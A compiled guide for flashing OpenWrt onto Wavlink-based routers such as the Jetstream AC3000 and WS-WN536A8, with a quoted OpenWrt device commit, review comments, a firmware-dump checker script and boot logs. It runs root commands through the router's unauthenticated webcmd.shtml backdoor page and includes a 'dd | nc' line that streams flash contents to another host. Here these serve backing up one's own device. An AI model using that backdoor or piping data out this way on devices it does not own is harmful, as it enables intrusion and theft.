f for JETSTREAM AC3000 aka ERAC3000 WS-WN536A8, WS-WN533A8, ARK T6, Quantum Max, Quantum T10, Quantum T12, Quantum D4C, Quantum D4, Quantum D6Q, Quantum D6, Quantum T8, Quantum T6

Incentive to get rid of stock firmware and replace with openwrt for all these models found here

Backdoor Unauthenticated RCE – CVE-2020-10971 and CVE-2020-10972

https://james-clee.com/2020/04/18/multiple-wavlink-vulnerabilities/

This is regarding :

JETSTREAM AC3000 aka ERAC3000 WS-WN536A8, WS-WN533A8, ARK T6, Quantum Max, Quantum T10, Quantum T12, Quantum D4C, Quantum D4, Quantum D6Q, Quantum D6, Quantum T8, Quantum T6

These models essentially share the same stock firmware, found with basic dirty instructions here:

https://github.com/bubbadestroy/Jetstream_AC3000

That said, below are all the steps and notes for getting this thing cleaned up with a fresh, clean OpenWrt firmware.

https://frickel.cloud/firmware/openwrt/-/commit/92780d80ab6f5f03fac2407c06eb267dd83914a1

https://frickel.cloud/firmware/openwrt/-/tree/92780d80ab6f5f03fac2407c06eb267dd83914a1/target/linux/ramips DavideFioravanti:winstars_ws-wn583a6

ramips: add support for Winstars WS-WN583A6

The Winstars WS-WN583A6 is a wireless repeater with 2 gigabit ethernet ports. Even if mine is branded as "Gemeita AC2100", the sticker on the back says WS-WN583A6. So I will refer to it as Winstars WS-WN583A6. Probably the real product name is the Wavlink WL-WN583A6 because of the many references to Wavlink in the OEM firmware and bootlog.

Hardware

SoC: Mediatek MT7621AT (880 MHz, 2 cores 4 threads)
RAM: 128MB
FLASH: 8MB NOR (GigaDevice GD25Q64B)
ETH: 2x 10/100/1000 Mbps Ethernet (MT7530)
WIFI:

  • 2.4GHz: 1x MT7603E (2x2:2)
  • 5GHz: 1x MT7615E (4x4:4)
  • 6 internal antennas

BTN:

  • 1x Reset button
  • 1x WPS button
  • 1x ON/OFF switch (working but unmodifiable)
  • 1x Auto/Schedule switch (working but unmodifiable. Read Note #3)

LEDS:

  • 1x White led
  • 1x Red led
  • 1x Amber led
  • 1x Blue led
  • 2x Blue leds (lan and wan port status: working but unmodifiable)

UART:

  • 57600-8-N-1

Everything works correctly.

Currently there is no firmware update available. Because of this, in order to restore the OEM firmware, you must firstly dump the OEM firmware from your router before you flash the OpenWrt image.

Backup the OEM Firmware

The following steps are intended for users having little to no experience in Linux. Obviously there are many ways to backup the OEM firmware, but probably this is the easiest way for this router. Procedure tested on M83A6.V5030.191210 firmware version.

  1. Go to http://192.168.10.1/webcmd.shtml

  2. Type the following line in the "Command" input box:

       mkdir /etc_ro/lighttpd/www/dev; for i in /dev/mtd*ro; do dd if=${i} of=/etc_ro/lighttpd/www${i}; done

  3. Click "Apply"

  4. After few seconds, in the textarea should appear this output:

       16384+0 records in
       16384+0 records out
       8388608 bytes (8.0MB) copied, 4.038820 seconds, 2.0MB/s
       384+0 records in
       384+0 records out
       196608 bytes (192.0KB) copied, 0.095180 seconds, 2.0MB/s
       128+0 records in
       128+0 records out
       65536 bytes (64.0KB) copied, 0.032020 seconds, 2.0MB/s
       128+0 records in
       128+0 records out
       65536 bytes (64.0KB) copied, 0.031760 seconds, 2.0MB/s
       15744+0 records in
       15744+0 records out
       8060928 bytes (7.7MB) copied, 3.885280 seconds, 2.0MB/s
       dd: can't open '/dev/mtd5ro': No such device
       dd: can't open '/dev/mtd6ro': No such device
       dd: can't open '/dev/mtd7ro': No such device

    Excluding the "X.XXXXXX seconds" part, you should get the same exact output. If your output doesn't match mine, stop reading and ask for help in the forum.

  5. Open the following links to download the partitions of the OEM FW:

       http://192.168.10.1/dev/mtd0ro
       http://192.168.10.1/dev/mtd1ro
       http://192.168.10.1/dev/mtd2ro
       http://192.168.10.1/dev/mtd3ro
       http://192.168.10.1/dev/mtd4ro

    If one (or more) of these files weighs 0 bytes, stop reading and ask for help in the forum.

  6. Store these downloaded files in a safe place.

  7. Reboot your router to remove any temporary file from your router.

Installation

Flash the initramfs image in the OEM firmware interface. When openwrt boots, flash the sysupgrade image otherwise you won't be able to keep configuration between reboots.

Restore OEM Firmware

Flash the "mtd4ro" file you previously backed-up directly from LUCI. Warning: Remember to not keep settings! Warning2: Remember to force the flash.

Notes

  1. The "System Command" page allows to run every command as root. For example you can use "dd" and "nc" to backup the OEM firmware.

       PC (SERVER):     nc -l 5555 > ./mtdXro
       ROUTER (CLIENT): dd if=/dev/mtdXro | nc PC_IP_ADDRESS 5555

  2. The OEM web interface accepts only images containing the string "WN583A6" in the filename. Currently the OEM interface accepts only the initramfs image probably because it checks if the ih_size in the image header is equal to the whole image size (instead of the kernel size). Read more here: https://forum.openwrt.org/t/support-for-strong-1200/22768/19

  3. The white led (namely "Smart Night Light") can be controlled by the user only if the side switch is set to "Schedule" otherwise it will be activated by the light condition (there is a photodiode on the top side of the router)

  4. Router mac addresses:

       LAN      XX:XX:XX:XX:XX:8F
       WAN      XX:XX:XX:XX:XX:90
       WIFI 2G  XX:XX:XX:XX:XX:91
       WIFI 5G  XX:XX:XX:XX:XX:92

       LABEL    XX:XX:XX:XX:XX:91

Signed-off-by: Davide Fioravanti pantanastyle@gmail.com

winstars_ws-wn583a6 

@DavideFioravanti DavideFioravanti committed on Jul 25 1 parent 546e140 commit 7cb957abd9aeb15621b76fcdd69a415a87ca9201 Showing with 169 additions and 1 deletion. 154 target/linux/ramips/dts/mt7621_winstars_ws-wn583a6.dts @@ -0,0 +1,154 @@ // SPDX-License-Identifier: GPL-2.0-or-later OR MIT /dts-v1/;

#include "mt7621.dtsi"

#include <dt-bindings/gpio/gpio.h> #include <dt-bindings/input/input.h>

/ { compatible = "winstars,ws-wn583a6", "mediatek,mt7621-soc"; model = "Winstars WS-WN583A6";

aliases {
	led-boot = &led_status_red;
	led-failsafe = &led_status_red;
	led-running = &led_status_blue;
	led-upgrade = &led_status_red;
};

chosen {
	bootargs = "console=ttyS0,57600";
};

leds {
	compatible = "gpio-leds";

	night_light_white {
		label = "ws-wn583a6:white:night_light";
		gpios = <&gpio 15 GPIO_ACTIVE_HIGH>;
	};

	led_status_blue: status_blue {
		label = "ws-wn583a6:blue:status";
		gpios = <&gpio 22 GPIO_ACTIVE_LOW>;
	};

	status_amber {
		label = "ws-wn583a6:amber:status";
		gpios = <&gpio 24 GPIO_ACTIVE_LOW>;
	};

	led_status_red: status_red {
		label = "ws-wn583a6:red:status";
		gpios = <&gpio 25 GPIO_ACTIVE_LOW>;
	};
};

keys {
	compatible = "gpio-keys";

	reset {
		label = "reset";
		gpios = <&gpio 18 GPIO_ACTIVE_LOW>;
		linux,code = <KEY_RESTART>;
	};

	wps {
		label = "wps";
		gpios = <&gpio 13 GPIO_ACTIVE_LOW>;
		linux,code = <KEY_WPS_BUTTON>;
	};
};

};

&spi0 { status = "okay";

flash@0 {
	compatible = "jedec,spi-nor";
	reg = <0>;
	spi-max-frequency = <104000000>;
	m25p,fast-read;

	partitions {
		compatible = "fixed-partitions";
		#address-cells = <1>;
		#size-cells = <1>;

		partition@0 {
			label = "bootloader";
			reg = <0x0 0x30000>;
			read-only;
		};

		partition@30000 {
			label = "config";
			reg = <0x30000 0x10000>;
			read-only;
		};

		factory: partition@40000 {
			label = "factory";
			reg = <0x40000 0x10000>;
			read-only;
		};

		partition@50000 {
			compatible = "denx,uimage";
			label = "firmware";
			reg = <0x50000 0x7b0000>;
		};
	};
};

};

&pcie { status = "okay"; };

&pcie0 { wifi@0,0 { compatible = "mediatek,mt76"; reg = <0x0000 0 0 0 0>; mediatek,mtd-eeprom = <&factory 0x0000>; }; };

&pcie1 { wifi@0,0 { compatible = "mediatek,mt76"; reg = <0x0000 0 0 0 0>; mediatek,mtd-eeprom = <&factory 0x8000>; }; };

&gmac0 { mtd-mac-address = <&factory 0xe000>; };

&switch0 { ports { port@0 { status = "okay"; label = "wan"; mtd-mac-address = <&factory 0xe006>; };

	port@1 {
		status = "okay";
		label = "lan";
	};
};

};

&state_default { gpio { groups = "jtag", "wdt", "rgmii2"; function = "gpio"; }; };

&xhci { status = "disabled"; }; 12 target/linux/ramips/image/mt7621.mk @@ -1020,6 +1020,18 @@ define Device/wevo_w2914ns-v2 endef TARGET_DEVICES += wevo_w2914ns-v2

define Device/winstars_ws-wn583a6 $(Device/uimage-lzma-loader) IMAGE_SIZE := 7872k DEVICE_VENDOR := Winstars DEVICE_MODEL := WS-WN583A6 DEVICE_ALT0_VENDOR := Gemeita DEVICE_ALT0_MODEL := AC2100 KERNEL_INITRAMFS_SUFFIX := -WN583A6$$(KERNEL_SUFFIX) DEVICE_PACKAGES := kmod-mt7603 kmod-mt7615e kmod-mt7615-firmware wpad-basic endef TARGET_DEVICES += winstars_ws-wn583a6

define Device/xiaomi-ac2100 $(Device/uimage-lzma-loader) BLOCKSIZE := 128k 4 target/linux/ramips/mt7621/base-files/etc/board.d/02_network @@ -9,7 +9,8 @@ ramips_setup_interfaces() local board="$1"

case $board in
asiarf,ap7621-001)
asiarf,ap7621-001|\
winstars,ws-wn583a6)
	ucidef_set_interfaces_lan_wan "lan" "wan"
	;;
asiarf,ap7621-nv1|\

@@ -113,6 +114,7 @@ ramips_setup_macs() wan_mac=$label_mac lan_mac=$(macaddr_add $label_mac 1) ;; winstars,ws-wn583a6|
zbtlink,zbt-we1326|
zbtlink,zbt-wg3526-16m|
zbtlink,zbt-wg3526-32m)
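
Review bot: In the leds node of mt7621_winstars_ws-wn583a6.dts, night_light_white has no comment about the hardware switch, although Note 3 of the commit message says the white LED is user-controllable only when the side switch is set to "Schedule". A one-line comment above the node would save the next reader from chasing an LED that ignores writes in the other switch position. The port-status LEDs and the two switches described as "working but unmodifiable" have no nodes at all; a short comment saying they are intentionally left out would show they were not forgotten.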
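
Review bot: In Device/winstars_ws-wn583a6 in mt7621.mk, the line "KERNEL_INITRAMFS_SUFFIX := -WN583A6$$(KERNEL_SUFFIX)" overrides the suffix without saying why. The reason (the OEM web interface only accepts filenames containing "WN583A6") is given only in the commit message, so please add it as a comment next to the line. IMAGE_SIZE := 7872k does match the 0x7b0000 firmware partition declared in the DTS.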
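
Review bot: In the ramips_setup_macs() hunk of 02_network, winstars,ws-wn583a6 is added to the zbtlink case branch, but the body of that branch lies outside the visible context. The commit message lists the label MAC as ending in :91 (the same as WIFI 2G), while LAN and WAN end in :8F and :90 and the DTS takes the gmac0 and wan addresses from factory offsets 0xe000 and 0xe006. Please confirm that the shared branch produces the :91 label address rather than the LAN or WAN one, and extend the context or mention the source offset in the commit message so this can be checked from the patch.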

https://git.openwrt.org/?p=openwrt/openwrt.git;a=commit;h=51b653de94e7e5006b5480df33d5dfd9de824cc7
# DIRTY FLASH OPENWRT on the following
Model Difference Statement: "We would like to confirm the models:
• WS-WN536A8, WS-WN533A8, ARK T6, Quantum Max, Quantum T10, Quantum T12,
• Quantum D4C, Quantum D4, Quantum D6Q, Quantum D6, Quantum T8, Quantum T6
are same in all respects. Only the model name and appearance is different.
The model WS-WN536A8 is the tested sample."
https://fccid.io/NZ3-WN536A8/Letter/Model-Difference-Statement-3975614
# Bubba finally destroy stock firmware and destroy the flash, but fix it easy with luci intact!
# Thanks everyone mentioned below and those who I don't know yet to credit.. .. So glad this got done!
# Jetstream-AC3000 # EMATIC ERAC3000 # WAVLINK # WINSTAR # WINSTARS # DLINK and more?
Instructions that work for the above router: OpenWrt for Wavlink WL-WN531A6 (or whatever your similar model is)
(they are all the same)
https://openwrt.org/toh/wavlink/wavlink_wl-wn531a6
https://git.openwrt.org/?p=openwrt/openwrt.git;a=commit;h=51b653de94e7e5006b5480df33d5dfd9de824cc7
# Suggested that you backup your config and then factory reset first.
# Format a FAT32 USB and place it in the WS-WN536A8 usb
# go to the following address
192.168.10.1/webcmd.shtml
# copy and paste this
dd if=/dev/mtd4ro of=/media/sda1/firmware.bin
Backup the OEM Firmware:
-----------------------
There isn't any firmware released for the WS-WN536A8 on
the Wavlink/Winstar/Ematic web site. Reverting back to the OEM firmware is
not possible unless we have a backup of the original OEM
firmware.
The OEM firmware is stored on /dev/mtd4 ("Kernel").
1) Plug a FAT32 formatted USB flash drive into the USB port.
2) Navigate to "Setup->USB Storage". Under the "Available
Network folder" you can see part of the mount point of
the newly mounted flash drive filesystem - e.g "sda1".
The full mount point is prefixed with "/media", so in
this case the mount point becomes "/media/sda1".
3) Go to http://192.168.10.1/webcmd.shtml .
4) Type the following line in the "Command" input box:
dd if=/dev/mtd4ro of=/media/sda1/firmware.bin
5) Click "Apply"
6) After few seconds, in the text area should appear this
output:
30080+0 records in
30080+0 records out
7) Type "sync" in the "Command" input box and click "Apply".
8) At this point the OEM firmware is stored on the flash
drive as "firmware.bin". The size of the file is 15040 KB.
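
A check for the firmware.bin saved in step 8, as an added example that is not part of the original notes: it confirms the file size matches the dd output above and validates the image header and data CRCs before the file is trusted as the only restore image. It assumes the OEM image starts with a legacy U-Boot uImage header (an assumption about this firmware); the function names and the sample image are constructed for this example.

```python
"""Sanity-check a dumped firmware partition before relying on it for restore."""
import struct
import sys
import zlib

UIMAGE_MAGIC = 0x27051956               # legacy U-Boot uImage magic
UIMAGE_HDR = struct.Struct(">7I4B32s")  # 64-byte big-endian header
EXPECTED_SIZE = 30080 * 512             # dd output: 30080 records of 512 bytes (15040 KB)


def parse_header(blob):
    """Unpack the 64-byte uImage header into a dict of the fields we check."""
    (magic, hcrc, _time, size, _load, _entry, dcrc,
     _os, _arch, _type, _comp, name) = UIMAGE_HDR.unpack_from(blob)
    return {"magic": magic, "hcrc": hcrc, "size": size, "dcrc": dcrc,
            "name": name.rstrip(b"\0").decode("ascii", "replace")}


def check_dump(blob, expected_size=EXPECTED_SIZE):
    """Return a list of problems; an empty list means the dump looks sane."""
    problems = []
    if len(blob) != expected_size:
        problems.append(f"size is {len(blob)} bytes, expected {expected_size}")
    if len(blob) < UIMAGE_HDR.size:
        return problems + ["too short to contain a uImage header"]
    if blob.count(blob[:1]) == len(blob):
        return problems + [f"every byte is 0x{blob[0]:02x} (blank or failed read)"]

    hdr = parse_header(blob)
    if hdr["magic"] != UIMAGE_MAGIC:
        return problems + [f"bad magic 0x{hdr['magic']:08x}"]

    # The header CRC is computed with the ih_hcrc field itself set to zero.
    raw = bytearray(blob[:UIMAGE_HDR.size])
    raw[4:8] = b"\0\0\0\0"
    if zlib.crc32(bytes(raw)) != hdr["hcrc"]:
        problems.append("header CRC mismatch")

    # ih_size bytes follow the header; anything after that is rootfs or padding.
    payload = blob[UIMAGE_HDR.size:UIMAGE_HDR.size + hdr["size"]]
    if len(payload) < hdr["size"]:
        problems.append("ih_size runs past the end of the dump (truncated)")
    elif zlib.crc32(payload) != hdr["dcrc"]:
        problems.append("data CRC mismatch")
    return problems


def build_sample(payload, total_size, name=b"constructed sample"):
    """Constructed test input: a valid uImage padded with 0xFF like erased NOR."""
    # Load/entry addresses and the OS/arch/type/compression codes are constructed.
    fields = [UIMAGE_MAGIC, 0, 0, len(payload), 0x80001000, 0x80001000,
              zlib.crc32(payload), 5, 5, 2, 3]
    hdr = bytearray(UIMAGE_HDR.pack(*fields, name))
    struct.pack_into(">I", hdr, 4, zlib.crc32(bytes(hdr)))
    image = bytes(hdr) + payload
    return image + b"\xff" * (total_size - len(image))


if __name__ == "__main__":
    if len(sys.argv) > 1:                       # e.g. python3 check.py firmware.bin
        with open(sys.argv[1], "rb") as fh:
            issues = check_dump(fh.read())
    else:                                       # offline demo on the constructed sample
        issues = check_dump(build_sample(b"K" * 4096, 8192), expected_size=8192)
    print("OK" if not issues else "\n".join(issues))
    sys.exit(1 if issues else 0)
```

Run it against the copy on the PC after the USB drive has been unplugged from the router, and keep a hash of the verified file next to the backup.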
# Last chance to look around the old shit interface
# ls -la or whatever you want from
http://192.168.10.1/webcmd.shtml
-rwxr-xr-x 1 0 0 62384 nas.cgi
-rwxr-xr-x 1 0 0 66847 login.cgi
-rwxr-xr-x 1 0 0 18963 upload.cgi
-rwxr-xr-x 1 0 0 105596 adm.cgi
-rwxr-xr-x 1 0 0 61945 mesh.cgi
-rwxr-xr-x 1 0 0 17469 upload_settings.cgi
-rwxr-xr-x 1 0 0 1057 ExportLogs.sh
-rwxr-xr-x 1 0 0 96964 wireless.cgi
-rwxr-xr-x 1 0 0 97216 firewall.cgi
-rwxr-xr-x 1 0 0 80013 internet.cgi
-rwxr-xr-x 1 0 0 61923 touchlist_sync.cgi
-rwxr-xr-x 1 0 0 9015 live_api.cgi
-rwxr-xr-x 1 0 0 62841 upload_uboot.cgi
-rwxr-xr-x 1 0 0 551 ExportAllSettings.sh
-rwxr-xr-x 1 0 0 57950 applogin.cgi
-rwxr-xr-x 1 0 0 93639 makeRequest.cgi
-rwxr-xr-x 1 0 0 57482 ddns.cgi
## WARNING ( I had no LUCI at first, but found the work around just fine and now have luci )
Installation:
------------
* Flashing instructions (OEM web interface):
The OEM web interface accepts only files with names containing
"WN536A8". It's also impossible to flash the *-sysupgrade.bin
image, so we have to flash the *-initramfs-kernel.bin first and
use the OpenWrt's upgrade interface to write the sysupgrade
image.
1) Rename openwrt-ramips-mt7621-wavlink_wl-wn531a6-initramfs-kernel.bin
to WS-WN536A8.bin.
2) Connect your computer to the one of the LAN ports of the
router with an Ethernet cable and open http://192.168.10.1
3) Browse to Setup -> Firmware Upgrade interface.
4) Upload the (renamed) OpenWrt image - WN536A8.bin.
5) Proceed with the firmware installation and give the device
a few minutes to finish and reboot.
# I didn't have LUCI at first so..
# WARNING The next few steps are due to the original guide coming from another model (same hardware, but be warned, likely bugs). Make sure to be in the /tmp directory
Go to a PowerShell prompt or use PuTTY
ping 192.168.1.1
ctrl-c
ssh root@192.168.1.1
cd /tmp
wget http://downloads.openwrt.org/snapshots/targets/ramips/mt7621/openwrt-ramips-mt7621-wavlink_wl-wn531a6-squashfs-sysupgrade.bin
sysupgrade openwrt-ramips-mt7621-wavlink_wl-wn531a6-squashfs-sysupgrade.bin
# and wait for some time to let it get an ip or
sync
ping 192.168.1.1
ctrl-c
ssh root@192.168.1.1
cd /tmp
opkg install uhttpd uhttpd-mod-ubus libiwinfo-lua luci-base luci-app-firewall luci-mod-admin-full luci-theme-bootstrap
sync
root@OpenWrt:/# dmesg
[ 0.000000] Linux version 5.4.61 (builder@buildhost) (gcc version 8.4.0 (OpenWrt GCC 8.4.0 r14391-7f676b5ed6)) #0 SMP Sat Sep 5 13:43:16 2020
[ 0.000000] SoC Type: MediaTek MT7621 ver:1 eco:3
[ 0.000000] printk: bootconsole [early0] enabled
[ 0.000000] CPU0 revision is: 0001992f (MIPS 1004Kc)
[ 0.000000] MIPS: machine is Wavlink WL-WN531A6
[ 0.000000] Initrd not found or empty - disabling initrd
[ 0.000000] VPE topology {2} total 2
[ 0.000000] Primary instruction cache 32kB, VIPT, 4-way, linesize 32 bytes.
[ 0.000000] Primary data cache 32kB, 4-way, PIPT, no aliases, linesize 32 bytes
[ 0.000000] MIPS secondary cache 256kB, 8-way, linesize 32 bytes.
[ 0.000000] Zone ranges:
[ 0.000000] Normal [mem 0x0000000000000000-0x0000000007ffffff]
[ 0.000000] HighMem empty
[ 0.000000] Movable zone start for each node
[ 0.000000] Early memory node ranges
[ 0.000000] node 0: [mem 0x0000000000000000-0x0000000007ffffff]
[ 0.000000] Initmem setup node 0 [mem 0x0000000000000000-0x0000000007ffffff]
[ 0.000000] On node 0 totalpages: 32768
[ 0.000000] Normal zone: 288 pages used for memmap
[ 0.000000] Normal zone: 0 pages reserved
[ 0.000000] Normal zone: 32768 pages, LIFO batch:7
[ 0.000000] percpu: Embedded 14 pages/cpu s26768 r8192 d22384 u57344
[ 0.000000] pcpu-alloc: s26768 r8192 d22384 u57344 alloc=14*4096
[ 0.000000] pcpu-alloc: [0] 0 [0] 1
[ 0.000000] Built 1 zonelists, mobility grouping on. Total pages: 32480
[ 0.000000] Kernel command line: console=ttyS0,57600 rootfstype=squashfs,jffs2
[ 0.000000] Dentry cache hash table entries: 16384 (order: 4, 65536 bytes, linear)
[ 0.000000] Inode-cache hash table entries: 8192 (order: 3, 32768 bytes, linear)
[ 0.000000] Writing ErrCtl register=00011cd0
[ 0.000000] Readback ErrCtl register=00011cd0
[ 0.000000] mem auto-init: stack:off, heap alloc:off, heap free:off
[ 0.000000] Memory: 120696K/131072K available (5929K kernel code, 207K rwdata, 1272K rodata, 1284K init, 238K bss, 10376K reserved, 0K cma-reserved, 0K highmem)
[ 0.000000] SLUB: HWalign=32, Order=0-3, MinObjects=0, CPUs=2, Nodes=1
[ 0.000000] rcu: Hierarchical RCU implementation.
[ 0.000000] rcu: RCU restricting CPUs from NR_CPUS=4 to nr_cpu_ids=2.
[ 0.000000] rcu: RCU calculated value of scheduler-enlistment delay is 25 jiffies.
[ 0.000000] rcu: Adjusting geometry for rcu_fanout_leaf=16, nr_cpu_ids=2
[ 0.000000] NR_IRQS: 256
[ 0.000000] random: get_random_bytes called from start_kernel+0x340/0x558 with crng_init=0
[ 0.000000] CPU Clock: 880MHz
[ 0.000000] clocksource: GIC: mask: 0xffffffffffffffff max_cycles: 0xcaf478abb4, max_idle_ns: 440795247997 ns
[ 0.000000] clocksource: MIPS: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 4343773742 ns
[ 0.000009] sched_clock: 32 bits at 440MHz, resolution 2ns, wraps every 4880645118ns
[ 0.015482] Calibrating delay loop... 583.68 BogoMIPS (lpj=1167360)
[ 0.055787] pid_max: default: 32768 minimum: 301
[ 0.065106] Mount-cache hash table entries: 1024 (order: 0, 4096 bytes, linear)
[ 0.079503] Mountpoint-cache hash table entries: 1024 (order: 0, 4096 bytes, linear)
[ 0.097215] rcu: Hierarchical SRCU implementation.
[ 0.107126] smp: Bringing up secondary CPUs ...
[ 0.117248] Primary instruction cache 32kB, VIPT, 4-way, linesize 32 bytes.
[ 0.117259] Primary data cache 32kB, 4-way, PIPT, no aliases, linesize 32 bytes
[ 0.117270] MIPS secondary cache 256kB, 8-way, linesize 32 bytes.
[ 0.117365] CPU1 revision is: 0001992f (MIPS 1004Kc)
[ 0.144184] Synchronize counters for CPU 1: done.
[ 0.203825] smp: Brought up 1 node, 2 CPUs
[ 0.216044] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645041785100000 ns
[ 0.235327] futex hash table entries: 512 (order: 2, 16384 bytes, linear)
[ 0.248980] pinctrl core: initialized pinctrl subsystem
[ 0.261031] NET: Registered protocol family 16
[ 0.283216] FPU Affinity set after 4688 emulations
[ 0.303527] workqueue: max_active 576 requested for napi_workq is out of range, clamping between 1 and 512
[ 0.324931] clocksource: Switched to clocksource GIC
[ 0.336599] NET: Registered protocol family 2
[ 0.346336] tcp_listen_portaddr_hash hash table entries: 512 (order: 0, 6144 bytes, linear)
[ 0.362978] TCP established hash table entries: 1024 (order: 0, 4096 bytes, linear)
[ 0.378104] TCP bind hash table entries: 1024 (order: 1, 8192 bytes, linear)
[ 0.392093] TCP: Hash tables configured (established 1024 bind 1024)
[ 0.404839] UDP hash table entries: 256 (order: 1, 8192 bytes, linear)
[ 0.417738] UDP-Lite hash table entries: 256 (order: 1, 8192 bytes, linear)
[ 0.431793] NET: Registered protocol family 1
[ 0.440366] PCI: CLS 0 bytes, default 32
[ 0.536915] 4 CPUs re-calibrate udelay(lpj = 1163264)
[ 0.548462] workingset: timestamp_bits=14 max_order=15 bucket_order=1
[ 0.574652] squashfs: version 4.0 (2009/01/31) Phillip Lougher
[ 0.586160] jffs2: version 2.2 (NAND) (SUMMARY) (LZMA) (RTIME) (CMODE_PRIORITY) (c) 2001-2006 Red Hat, Inc.
[ 0.609177] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 251)
[ 0.625917] mt7621_gpio 1e000600.gpio: registering 32 gpios
[ 0.637258] mt7621_gpio 1e000600.gpio: registering 32 gpios
[ 0.648545] mt7621_gpio 1e000600.gpio: registering 32 gpios
[ 0.660391] Serial: 8250/16550 driver, 16 ports, IRQ sharing enabled
[ 0.677078] printk: console [ttyS0] disabled
[ 0.685539] 1e000c00.uartlite: ttyS0 at MMIO 0x1e000c00 (irq = 15, base_baud = 3125000) is a 16550A
[ 0.703462] printk: console [ttyS0] enabled
[ 0.720015] printk: bootconsole [early0] disabled
[ 0.739571] 1e000d00.uartlite2: ttyS1 at MMIO 0x1e000d00 (irq = 16, base_baud = 3125000) is a 16550A
[ 0.761527] spi-mt7621 1e000b00.spi: sys_freq: 220000000
[ 0.773937] random: fast init done
[ 0.775041] spi-nor spi0.0: gd25q128 (16384 Kbytes)
[ 0.790539] 5 fixed-partitions partitions found on MTD device spi0.0
[ 0.803199] Creating 5 MTD partitions on "spi0.0":
[ 0.812766] 0x000000000000-0x000000030000 : "u-boot"
[ 0.824218] 0x000000030000-0x000000040000 : "config"
[ 0.835591] 0x000000040000-0x000000050000 : "factory"
[ 0.847149] 0x000000050000-0x000000f00000 : "firmware"
[ 0.859038] 2 uimage-fw partitions found on MTD device firmware
[ 0.870992] Creating 2 MTD partitions on "firmware":
[ 0.880917] 0x000000000000-0x00000025c990 : "kernel"
[ 0.892283] 0x00000025c990-0x000000eb0000 : "rootfs"
[ 0.903620] mtd: device 5 (rootfs) set to be root filesystem
[ 0.915025] 1 squashfs-split partitions found on MTD device rootfs
[ 0.927359] 0x0000005a0000-0x000000eb0000 : "rootfs_data"
[ 0.939574] 0x000000f00000-0x000001000000 : "vendor"
[ 0.951976] libphy: Fixed MDIO Bus: probed
[ 0.987417] libphy: mdio: probed
[ 0.994109] mt7530 mdio-bus:1f: MT7530 adapts as multi-chip module
[ 1.007456] mtk_soc_eth 1e100000.ethernet eth0: mediatek frame engine at 0xbe100000, irq 18
[ 1.025334] i2c-mt7621 1e000900.i2c: clock 100 kHz
[ 1.036495] mt7621-pci 1e140000.pcie: Parsing DT failed
[ 1.050030] NET: Registered protocol family 10
[ 1.060572] Segment Routing with IPv6
[ 1.068024] NET: Registered protocol family 17
[ 1.076989] bridge: filtering via arp/ip/ip6tables is no longer available by default. Update your scripts to load br_netfilter if you need this.
[ 1.103097] 8021q: 802.1Q VLAN Support v1.8
[ 1.114032] mt7530 mdio-bus:1f: MT7530 adapts as multi-chip module
[ 1.137212] libphy: dsa slave smi: probed
[ 1.145660] mt7530 mdio-bus:1f lan1 (uninitialized): PHY [dsa-0.0:00] driver [Generic PHY]
[ 1.163734] mt7530 mdio-bus:1f lan2 (uninitialized): PHY [dsa-0.0:01] driver [Generic PHY]
[ 1.181771] mt7530 mdio-bus:1f lan3 (uninitialized): PHY [dsa-0.0:02] driver [Generic PHY]
[ 1.199792] mt7530 mdio-bus:1f lan4 (uninitialized): PHY [dsa-0.0:03] driver [Generic PHY]
[ 1.217970] mt7530 mdio-bus:1f wan (uninitialized): PHY [dsa-0.0:04] driver [Generic PHY]
[ 1.235909] mt7530 mdio-bus:1f: configuring for fixed/rgmii link mode
[ 1.253556] DSA: tree 0 setup
[ 1.259829] rt2880-pinmux pinctrl: pcie is already enabled
[ 1.270787] mt7621-pci 1e140000.pcie: Error applying setting, reverse things back
[ 1.285860] mt7621-pci-phy 1e149000.pcie-phy: PHY for 0xbe149000 (dual port = 1)
[ 1.300783] mt7621-pci-phy 1e14a000.pcie-phy: PHY for 0xbe14a000 (dual port = 0)
[ 1.415396] mt7621-pci-phy 1e149000.pcie-phy: Xtal is 40MHz
[ 1.426518] mt7621-pci-phy 1e14a000.pcie-phy: Xtal is 40MHz
[ 1.537423] mt7621-pci 1e140000.pcie: pcie2 no card, disable it (RST & CLK)
[ 1.551298] mt7621-pci 1e140000.pcie: PCIE0 enabled
[ 1.561021] mt7621-pci 1e140000.pcie: PCIE1 enabled
[ 1.570747] mt7621-pci 1e140000.pcie: PCI coherence region base: 0x60000000, mask/settings: 0xf0000002
[ 1.589489] mt7621-pci 1e140000.pcie: PCI host bridge to bus 0000:00
[ 1.602175] pci_bus 0000:00: root bus resource [io 0x1e160000-0x1e16ffff]
[ 1.615880] pci_bus 0000:00: root bus resource [mem 0x60000000-0x6fffffff]
[ 1.629587] pci_bus 0000:00: root bus resource [bus 00-ff]
[ 1.640557] pci 0000:00:00.0: [0e8d:0801] type 01 class 0x060400
[ 1.652562] pci 0000:00:00.0: reg 0x10: [mem 0x00000000-0x7fffffff]
[ 1.665064] pci 0000:00:00.0: reg 0x14: [mem 0x60400000-0x6040ffff]
[ 1.677624] pci 0000:00:00.0: supports D1
[ 1.685617] pci 0000:00:00.0: PME# supported from D0 D1 D3hot
[ 1.697483] pci 0000:00:01.0: [0e8d:0801] type 01 class 0x060400
[ 1.709499] pci 0000:00:01.0: reg 0x10: [mem 0x00000000-0x7fffffff]
[ 1.721996] pci 0000:00:01.0: reg 0x14: [mem 0x60410000-0x6041ffff]
[ 1.734543] pci 0000:00:01.0: supports D1
[ 1.742535] pci 0000:00:01.0: PME# supported from D0 D1 D3hot
[ 1.755506] pci 0000:01:00.0: [14c3:7615] type 00 class 0x000280
[ 1.767545] pci 0000:01:00.0: reg 0x10: [mem 0x00000000-0x000fffff 64bit]
[ 1.781241] pci 0000:01:00.0: 2.000 Gb/s available PCIe bandwidth, limited by 2.5 GT/s x1 link at 0000:00:00.0 (capable of 4.000 Gb/s with 5 GT/s x1 link)
[ 1.810129] pci 0000:00:00.0: PCI bridge to [bus 01-ff]
[ 1.820559] pci 0000:00:00.0: bridge window [io 0x0000-0x0fff]
[ 1.832707] pci 0000:00:00.0: bridge window [mem 0x60000000-0x600fffff]
[ 1.846241] pci 0000:00:00.0: bridge window [mem 0x60100000-0x601fffff pref]
[ 1.860639] pci_bus 0000:01: busn_res: [bus 01-ff] end is updated to 01
[ 1.874051] pci 0000:02:00.0: [14c3:7615] type 00 class 0x000280
[ 1.886079] pci 0000:02:00.0: reg 0x10: [mem 0x00000000-0x000fffff 64bit]
